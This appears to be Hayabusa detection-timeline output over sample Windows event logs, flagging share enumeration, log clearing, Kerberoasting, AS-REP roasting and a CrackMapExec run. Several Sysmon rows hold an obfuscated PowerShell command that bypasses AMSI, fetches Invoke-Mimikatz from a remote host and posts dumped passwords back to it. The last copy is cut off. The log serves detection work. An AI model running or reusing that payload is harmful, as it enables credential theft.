+2021-04-28 00:03:20.658 +09:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:03:30.691 +09:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:03:37.825 +09:00,fs02.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x3902ff1,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:03:37.866 +09:00,dhcp01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x5df8549a,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:03:37.904 +09:00,wsus01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x57d35acf,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:03:37.916 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x13faf39,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:03:37.917 +09:00,win10-02.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x873c5b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:03:40.730 +09:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:03:50.745 +09:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:04:00.785 +09:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:04:10.808 +09:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-29 16:55:53.423 +09:00,DC-Server-1.labcorp.local,1102,high,Evas,Security Log Cleared,User: Administrator,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:56:26.433 +09:00,DC-Server-1.labcorp.local,4769,info,,Kerberos Service Ticket Requested,User: Bob@LABCORP.LOCAL | Svc: DC-SERVER-1$ | IP Addr: ::ffff:192.168.1.2 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:56:26.435 +09:00,DC-Server-1.labcorp.local,4672,info,,Admin Logon,User: Bob | LID: 0xc66373,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:56:26.436 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: Bob | Computer:  | IP Addr: 192.168.1.2 | LID: 0xc66373,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:56:26.681 +09:00,DC-Server-1.labcorp.local,4769,info,,Kerberos Service Ticket Requested,User: Bob@LABCORP.LOCAL | Svc: DC-SERVER-1$ | IP Addr: ::ffff:192.168.1.2 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:56:26.683 +09:00,DC-Server-1.labcorp.local,4672,info,,Admin Logon,User: Bob | LID: 0xc66389,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:56:26.683 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: Bob | Computer:  | IP Addr: 192.168.1.2 | LID: 0xc66389,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:56:26.869 +09:00,DC-Server-1.labcorp.local,4768,medium,CredAccess,Possible AS-REP Roasting,Possible AS-REP Roasting,../hayabusa-rules/hayabusa/default/alerts/Security/4768_KerberosTGT-Request_AS-REP-Roasting.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:56:26.869 +09:00,DC-Server-1.labcorp.local,4768,info,,Kerberos TGT Requested,User: Alice | Svc: krbtgt | IP Addr: ::ffff:192.168.1.2 | Status: 0x0 | PreAuthType: 0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:56:26.980 +09:00,DC-Server-1.labcorp.local,4634,info,,Logoff,User: Bob | LID: 0xc66389,../hayabusa-rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:58:02.652 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer:  | IP Addr: fe80::e50e:b89e:4718:3aa | LID: 0xc712f1,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:58:02.666 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer:  | IP Addr: 192.168.1.100 | LID: 0xc7142b,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:58:02.761 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer:  | IP Addr: fe80::e50e:b89e:4718:3aa | LID: 0xc714d9,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:58:28.422 +09:00,DC-Server-1.labcorp.local,4769,info,,Kerberos Service Ticket Requested,User: DC-SERVER-1$@LABCORP.LOCAL | Svc: DC-SERVER-1$ | IP Addr: ::1 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:58:28.425 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer:  | IP Addr: fe80::e50e:b89e:4718:3aa | LID: 0xc7313f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:59:42.537 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer:  | IP Addr: fe80::e50e:b89e:4718:3aa | LID: 0xc7adb8,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:59:42.545 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer:  | IP Addr: fe80::e50e:b89e:4718:3aa | LID: 0xc7ae25,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 18:23:54.244 +09:00,DC-Server-1.labcorp.local,1102,high,Evas,Security Log Cleared,User: Administrator,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
+2021-04-29 18:23:58.690 +09:00,DC-Server-1.labcorp.local,4776,info,,NTLM Logon To Local Account,User: Alice | Computer:  | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
+2021-04-29 18:23:58.691 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: Alice | Computer:  | IP Addr: 192.168.1.200 | LID: 0x27d676,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
+2021-04-29 18:23:58.691 +09:00,DC-Server-1.labcorp.local,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
+2021-04-29 18:23:58.718 +09:00,DC-Server-1.labcorp.local,4768,medium,CredAccess,Possible Kerberoasting,Possible Kerberoasting Risk Activity.,../hayabusa-rules/hayabusa/default/alerts/Security/4768_KerberosTGT-Request_Kerberoasting.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
+2021-04-29 18:23:58.718 +09:00,DC-Server-1.labcorp.local,4768,info,,Kerberos TGT Requested,User: Alice | Svc: krbtgt | IP Addr: ::ffff:192.168.1.200 | Status: 0x0 | PreAuthType: 2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
+2021-04-29 18:23:58.726 +09:00,DC-Server-1.labcorp.local,4769,info,,Kerberos Service Ticket Requested,User: Alice@LABCORP.LOCAL | Svc: sql101 | IP Addr: ::ffff:192.168.1.200 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
+2021-04-29 18:23:58.735 +09:00,DC-Server-1.labcorp.local,4634,info,,Logoff,User: Alice | LID: 0x27d676,../hayabusa-rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
+2021-05-01 05:27:39.761 +09:00,win10-02.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "" -JOIN('91A78H101@116f46G83@101S114H118@105k99T101@80S111k105T110k116T77,97@110T97S103A101H114A93S58k58,83@101A114@118k101@114G67,101T114S116S105@102,105,99G97@116A101S86A97A108H105@100G97H116@105A111,110@67T97T108k108S98@97f99T107@32@61S32k123T36@116G114H117G101f125S10,116f114,121A123A10A91k82S101S102T93f46,65@115H115H101S109H98H108,121,46f71@101@116T84f121G112@101T40@39,83k121f115S39,43G39A116@101,109k46,77T97A110@39A43f39f97S103H101k109T101G110G116S46k65@117A116A39k43@39S111f109k97@116@105f111T110f46@65S109A39T43,39@115,105f85G116@39G43G39T105@108@115@39T41,46A71S101H116S70@105@101A108T100S40f39k97A109@39H43G39T115T105,73T110S105S39@43@39f116f70H97@105@108A101@100T39@44@32H39@78S111f110G80@39A43@39H117H98k108G105H99S44@83@116T97T39G43S39S116A105@99,39H41H46T83S101S116k86T97A108,117H101@40f36,110A117k108A108@44k32@36@116f114T117@101G41G10,125,99f97H116A99@104H123f125,10H91T78T101f116k46A83f101S114f118S105,99,101A80k111f105G110f116f77S97A110k97@103T101,114@93S58k58T83H101H114G118,101@114@67G101@114A116@105G102H105k99G97S116T101@86S97f108k105k100H97G116S105,111k110k67k97T108@108,98S97@99@107A32H61,32,123@36H116f114k117,101k125@10,91@83f121k115S116@101@109S46H78G101A116S46@83S101A114T118T105@99H101@80H111G105f110,116f77H97f110S97@103,101f114H93A58f58A83@101k99@117G114,105@116@121@80S114A111,116A111f99k111k108@32@61@32H91k83T121,115@116f101H109T46@78@101@116T46G83k101,99f117@114k105k116@121f80H114T111A116f111G99G111@108A84S121H112G101@93G39A83A115k108H51@44,84T108G115k44k84T108A115T49A49@44@84G108@115@49S50@39@10S73k69T88G32f40@78A101@119@45f79,98H106@101S99k116k32G78,101A116@46@87@101k98G67S108G105,101@110G116G41G46@68S111@119f110H108H111,97@100@83H116@114H105@110@103k40H39A104A116H116A112S115A58G47f47S49H48T46A50H51,46k49H50H51k46H49k49H58H52A52f51f47@73@110S118f111@107k101G45S77@105T109@105,107,97,116H122H46k112A115k49T39@41T10T36S99@109T100S32,61S32f73H110H118H111T107,101@45H77@105f109,105@107k97@116@122T32,45k67H111H109H109@97S110k100S32S39T112k114,105f118k105,108G101T103A101,58H58A100A101S98S117,103S32@115@101H107@117@114A108k115,97f58,58f108S111H103S111A110,112H97f115H115G119@111G114@100f115@32S101f120f105k116G39,10G36G114H101f113k117,101S115G116@32@61,32A91A83T121T115k116k101G109G46H78H101S116@46H87k101T98G82S101S113@117A101@115k116H93@58S58@67T114,101T97H116S101@40k39T104f116k116k112k115S58,47f47@49G48@46,50k51G46@49G50,51H46@49@49A58H52H52,51@47@39k41A10H36S114H101A113,117@101@115k116@46,77,101H116@104G111k100S32@61A32S39S80G79k83k84k39T10H36@114k101,113T117H101H115@116,46,67H111T110@116S101@110G116T84@121S112,101k32G61H32T39H97,112G112,108T105f99k97f116k105f111@110T47@120G45,119H119S119S45T102S111,114H109A45f117G114f108f101H110H99H111k100f101k100T39@10,36A98@121G116f101@115f32T61T32G91H83A121S115G116,101,109T46k84G101f120T116S46T69A110G99T111k100,105S110k103@93@58T58S65T83S67S73G73G46A71A101G116f66k121f116@101H115T40,36,99T109@100S41k10@36A114H101f113@117H101H115H116G46G67A111,110@116,101f110,116T76A101H110f103f116@104@32,61S32S36@98T121H116G101,115f46A76@101f110A103f116H104A10@36G114G101G113A117f101H115k116k83,116f114G101T97k109A32S61T32f36H114@101,113f117@101f115S116H46f71f101G116,82S101T113f117,101,115S116,83,116T114H101k97f109T40S41,10T36S114H101G113H117S101f115H116H83@116A114G101G97H109G46f87k114k105H116G101T40A36f98f121@116H101k115T44@32S48S44k32,36,98k121G116@101@115T46G76@101H110,103G116A104,41H10k36T114G101G113A117@101@115@116T83k116A114k101T97H109A46H67S108S111A115A101k40T41T10H36k114S101@113f117T101@115S116S46f71@101f116,82f101f115@112T111k110@115S101k40@41'.sPlIT('@A@GkTfSH,' )|%%{([iNt] $_ -AS [char])})| .( $ENv:comsPec[4,26,25]-JOIn'')"" | Process: C:\Windows\System32\cmd.exe | User: OFFSEC\admmig | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x36df3b7 | PID: 7728 | PGUID: 9828DA72-683B-608C-A30C-000000000C00 | Hash: SHA1=F1EFB0FDDC156E4C61C5F78A54700E4E7984D55D,MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx
+2021-05-01 05:27:39.761 +09:00,win10-02.offsec.lan,1,high,Exec,Suspicious PowerShell Parent Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx
+2021-05-01 05:27:39.761 +09:00,win10-02.offsec.lan,1,high,Exec | Evas,CrackMapExec PowerShell Obfuscation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_crackmapexec_powershell_obfuscation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx
+2021-05-01 05:27:39.761 +09:00,win10-02.offsec.lan,1,high,Exec,Wmiprvse Spawning Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx
+2021-05-01 05:27:39.761 +09:00,win10-02.offsec.lan,1,medium,Exec,Change PowerShell Policies to an Unsecure Level,,../hayabusa-rules/sigma/process_creation/proc_creation_win_set_policies_to_unsecure_level.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx
+2021-05-01 05:27:39.761 +09:00,win10-02.offsec.lan,1,medium,Exec,Too Long PowerShell Commandlines,,../hayabusa-rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx
+2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Cmd: powershell.exe -exec bypass -noni -nop -w 1 -C "" -JOIN('91A78H101@116f46G83@101S114H118@105k99T101@80S111k105T110k116T77,97@110T97S103A101H114A93S58k58,83@101A114@118k101@114G67,101T114S116S105@102,105,99G97@116A101S86A97A108H105@100G97H116@105A111,110@67T97T108k108S98@97f99T107@32@61S32k123T36@116G114H117G101f125S10,116f114,121A123A10A91k82S101S102T93f46,65@115H115H101S109H98H108,121,46f71@101@116T84f121G112@101T40@39,83k121f115S39,43G39A116@101,109k46,77T97A110@39A43f39f97S103H101k109T101G110G116S46k65@117A116A39k43@39S111f109k97@116@105f111T110f46@65S109A39T43,39@115,105f85G116@39G43G39T105@108@115@39T41,46A71S101H116S70@105@101A108T100S40f39k97A109@39H43G39T115T105,73T110S105S39@43@39f116f70H97@105@108A101@100T39@44@32H39@78S111f110G80@39A43@39H117H98k108G105H99S44@83@116T97T39G43S39S116A105@99,39H41H46T83S101S116k86T97A108,117H101@40f36,110A117k108A108@44k32@36@116f114T117@101G41G10,125,99f97H116A99@104H123f125,10H91T78T101f116k46A83f101S114f118S105,99,101A80k111f105G110f116f77S97A110k97@103T101,114@93S58k58T83H101H114G118,101@114@67G101@114A116@105G102H105k99G97S116T101@86S97f108k105k100H97G116S105,111k110k67k97T108@108,98S97@99@107A32H61,32,123@36H116f114k117,101k125@10,91@83f121k115S116@101@109S46H78G101A116S46@83S101A114T118T105@99H101@80H111G105f110,116f77H97f110S97@103,101f114H93A58f58A83@101k99@117G114,105@116@121@80S114A111,116A111f99k111k108@32@61@32H91k83T121,115@116f101H109T46@78@101@116T46G83k101,99f117@114k105k116@121f80H114T111A116f111G99G111@108A84S121H112G101@93G39A83A115k108H51@44,84T108G115k44k84T108A115T49A49@44@84G108@115@49S50@39@10S73k69T88G32f40@78A101@119@45f79,98H106@101S99k116k32G78,101A116@46@87@101k98G67S108G105,101@110G116G41G46@68S111@119f110H108H111,97@100@83H116@114H105@110@103k40H39A104A116H116A112S115A58G47f47S49H48T46A50H51,46k49H50H51k46H49k49H58H52A52f51f47@73@110S118f111@107k101G45S77@105T109@105,107,97,116H122H46k112A115k49T39@41T10T36S99@109T100S32,61S32f73H110H118H111T107,101@45H77@105f109,105@107k97@116@122T32,45k67H111H109H109@97S110k100S32S39T112k114,105f118k105,108G101T103A101,58H58A100A101S98S117,103S32@115@101H107@117@114A108k115,97f58,58f108S111H103S111A110,112H97f115H115G119@111G114@100f115@32S101f120f105k116G39,10G36G114H101f113k117,101S115G116@32@61,32A91A83T121T115k116k101G109G46H78H101S116@46H87k101T98G82S101S113@117A101@115k116H93@58S58@67T114,101T97H116S101@40k39T104f116k116k112k115S58,47f47@49G48@46,50k51G46@49G50,51H46@49@49A58H52H52,51@47@39k41A10H36S114H101A113,117@101@115k116@46,77,101H116@104G111k100S32@61A32S39S80G79k83k84k39T10H36@114k101,113T117H101H115@116,46,67H111T110@116S101@110G116T84@121S112,101k32G61H32T39H97,112G112,108T105f99k97f116k105f111@110T47@120G45,119H119S119S45T102S111,114H109A45f117G114f108f101H110H99H111k100f101k100T39@10,36A98@121G116f101@115f32T61T32G91H83A121S115G116,101,109T46k84G101f120T116S46T69A110G99T111k100,105S110k103@93@58T58S65T83S67S73G73G46A71A101G116f66k121f116@101H115T40,36,99T109@100S41k10@36A114H101f113@117H101H115H116G46G67A111,110@116,101f110,116T76A101H110f103f116@104@32,61S32S36@98T121H116G101,115f46A76@101f110A103f116H104A10@36G114G101G113A117f101H115k116k83,116f114G101T97k109A32S61T32f36H114@101,113f117@101f115S116H46f71f101G116,82S101T113f117,101,115S116,83,116T114H101k97f109T40S41,10T36S114H101G113H117S101f115H116H83@116A114G101G97H109G46f87k114k105H116G101T40A36f98f121@116H101k115T44@32S48S44k32,36,98k121G116@101@115T46G76@101H110,103G116A104,41H10k36T114G101G113A117@101@115@116T83k116A114k101T97H109A46H67S108S111A115A101k40T41T10H36k114S101@113f117T101@115S116S46f71@101f116,82f101f115@112T111k110@115S101k40@41'.sPlIT('@A@GkTfSH,' )|%%{([iNt] $_ -AS [char])})| .( $ENv:comsPec[4,26,25]-JOIn'')"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: OFFSEC\admmig | Parent Cmd: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "" -JOIN('91A78H101@116f46G83@101S114H118@105k99T101@80S111k105T110k116T77,97@110T97S103A101H114A93S58k58,83@101A114@118k101@114G67,101T114S116S105@102,105,99G97@116A101S86A97A108H105@100G97H116@105A111,110@67T97T108k108S98@97f99T107@32@61S32k123T36@116G114H117G101f125S10,116f114,121A123A10A91k82S101S102T93f46,65@115H115H101S109H98H108,121,46f71@101@116T84f121G112@101T40@39,83k121f115S39,43G39A116@101,109k46,77T97A110@39A43f39f97S103H101k109T101G110G116S46k65@117A116A39k43@39S111f109k97@116@105f111T110f46@65S109A39T43,39@115,105f85G116@39G43G39T105@108@115@39T41,46A71S101H116S70@105@101A108T100S40f39k97A109@39H43G39T115T105,73T110S105S39@43@39f116f70H97@105@108A101@100T39@44@32H39@78S111f110G80@39A43@39H117H98k108G105H99S44@83@116T97T39G43S39S116A105@99,39H41H46T83S101S116k86T97A108,117H101@40f36,110A117k108A108@44k32@36@116f114T117@101G41G10,125,99f97H116A99@104H123f125,10H91T78T101f116k46A83f101S114f118S105,99,101A80k111f105G110f116f77S97A110k97@103T101,114@93S58k58T83H101H114G118,101@114@67G101@114A116@105G102H105k99G97S116T101@86S97f108k105k100H97G116S105,111k110k67k97T108@108,98S97@99@107A32H61,32,123@36H116f114k117,101k125@10,91@83f121k115S116@101@109S46H78G101A116S46@83S101A114T118T105@99H101@80H111G105f110,116f77H97f110S97@103,101f114H93A58f58A83@101k99@117G114,105@116@121@80S114A111,116A111f99k111k108@32@61@32H91k83T121,115@116f101H109T46@78@101@116T46G83k101,99f117@114k105k116@121f80H114T111A116f111G99G111@108A84S121H112G101@93G39A83A115k108H51@44,84T108G115k44k84T108A115T49A49@44@84G108@115@49S50@39@10S73k69T88G32f40@78A101@119@45f79,98H106@101S99k116k32G78,101A116@46@87@101k98G67S108G105,101@110G116G41G46@68S111@119f110H108H111,97@100@83H116@114H105@110@103k40H39A104A116H116A112S115A58G47f47S49H48T46A50H51,46k49H50H51k46H49k49H58H52A52f51f47@73@110S118f111@107k101G45S77@105T109@105,107,97,116H122H46k112A115k49T39@41T10T36S99@109T100S32,61S32f73H110H118H111T107,101@45H77@105f109,105@107k97@116@122T32,45k67H111H109H109@97S110k100S32S39T112k114,105f118k105,108G101T103A101,58H58A100A101S98S117,103S32@115@101H107@117@114A108k115,97f58,58f108S111H103S111A110,112H97f115H115G119@111G114@100f115@32S101f120f105k116G39,10G36G114H101f113k117,101S115G116@32@61,32A91A83T121T115k116k101G109G46H78H101S116@46H87k101T98G82S101S113@117A101@115k116H93@58S58@67T114,101T97H116S101@40k39T104f116k116k112k115S58,47f47@49G48@46,50k51G46@49G50,51H46@49@49A58H52H52,51@47@39k41A10H36S114H